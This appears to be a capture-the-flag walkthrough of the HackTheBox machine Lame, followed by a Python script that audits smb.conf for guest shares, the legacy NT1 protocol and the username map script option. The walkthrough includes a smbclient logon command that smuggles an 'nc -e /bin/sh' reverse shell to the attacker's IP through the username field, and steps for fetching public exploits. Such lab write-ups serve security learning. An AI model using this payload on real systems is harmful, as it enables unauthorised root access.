Lame is an easy-rated Linux machine from HackTheBox created by ch4p. There is no mystery to this machine, which makes it suitable for practice: you find something and search for that exploit. In this post, my IP is 10.10.14.49, and the target's IP is 10.129.223.149.
nmap -p- --open -T5 -v -n 10.129.223.149 -oG AllPorts
From here, we have FTP, SMB and NetBios Session Service, nothing about a website.
nmap -sCV -p 21,22,139,445,3632 10.129.223.149 -oN Target
Port 21 allows anonymous login and reports its version, vsFTPd 2.3.4. Perfect, we will search for that. Port 139 is another SMB service, but from a different workgroup.
ftp 10.129.223.149 # user: anonymous, pass: anonymous
Hey, there is nothing inside!
crackmapexec smb 10.129.223.149
smbmap -H 10.129.223.149
Look! There is an entrance at tmp, we should use that.
smbclient -L 10.129.223.149 -N
Fail, but this is a client-side error.
smbclient //10.129.223.149/tmp -N
And we can't log in with null?
Exploitation
At this point we have the following information: Port 21 FTP vsFTPd 2.3.4, Port 139 SMB (unknown version) and Port 445 SMB (3.0.20).
Search: vsFTPd 2.3.4 exploit
git clone https://github.com/ahervias77/vsftpd-2.3.4-exploit
cd vsftpd-2.3.4-exploit
batcat vsftpd_234_exploit.py
So, those are the instructions.
python3 vsftpd_234_exploit.py 10.129.223.149 21 whoami
It doesn't work, so let's try another way. At https://www.exploit-db.com/ search for Samba 3.0.20 (Windows issue), and download the exploit from https://www.exploit-db.com/exploits/16320
The exploit only connects to SMB and uses a long string as the username, and we know that the SMB has an unknown version. As we can see, the payload is a terminal command, so maybe we can change that part to create a reverse shell.
smbclient //10.129.223.149/tmp -N --option='client min protocol=NT1'
logon "/=`nohup nc -e /bin/sh 10.10.14.49 443 `"
Now your TermA is a root shell on the target.
Root
As you can see, we are connected as root, so we can get both flags directly.
script /dev/null -c bash
cat /home/makis/user.txt
cat /root/root.txt
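From the defender's side, the three conditions this walkthrough relied on (a guest-accessible tmp share, a server still accepting NT1, and a login name reaching a shell command) can be checked in smb.conf. The following is an added example, not part of the original post; it assumes the exploit-db 16320 issue is Samba's `username map script` option, and the sample configs and finding names are constructed for illustration.

```python
import configparser

# Constructed smb.conf files for illustration; not taken from the target.
WEAK_CONF = """
[global]
username map script = /etc/samba/scripts/mapusers.sh
server min protocol = NT1
[tmp]
path = /tmp
guest ok = yes
read only = no
"""
HARDENED_CONF = """
[global]
server min protocol = SMB2
[tmp]
path = /tmp
guest ok = no
read only = yes
"""
YES = {"yes", "true", "1"}
NO = {"no", "false", "0"}
LEGACY = {"core", "coreplus", "lanman1", "lanman2", "nt1"}


def audit_smb_conf(text):
    """Return (section, finding) pairs for the settings this box relied on."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",))
    # Strip indentation so indented options are not read as continuations.
    cp.read_string("\n".join(line.strip() for line in text.splitlines()))
    findings = []
    for section in cp.sections():
        opts = {k: v.strip().lower() for k, v in cp.items(section)}
        if section.lower() == "global":
            # Login names are handed to an external program via this option.
            if opts.get("username map script"):
                findings.append((section, "username-map-script"))
            proto = opts.get("server min protocol") or opts.get("min protocol")
            if proto in LEGACY:
                findings.append((section, "legacy-protocol"))
            continue
        # "public" and "writable"/"writeable"/"write ok" are smb.conf synonyms.
        guest = opts.get("guest ok", opts.get("public", "no")) in YES
        writable = opts.get("read only") in NO or any(
            opts.get(k) in YES for k in ("writable", "writeable", "write ok"))
        if guest:
            findings.append(
                (section, "guest-writable" if writable else "guest-access"))
    return findings
```

Calling `audit_smb_conf(WEAK_CONF)` lists all three findings, while `audit_smb_conf(HARDENED_CONF)` returns an empty list.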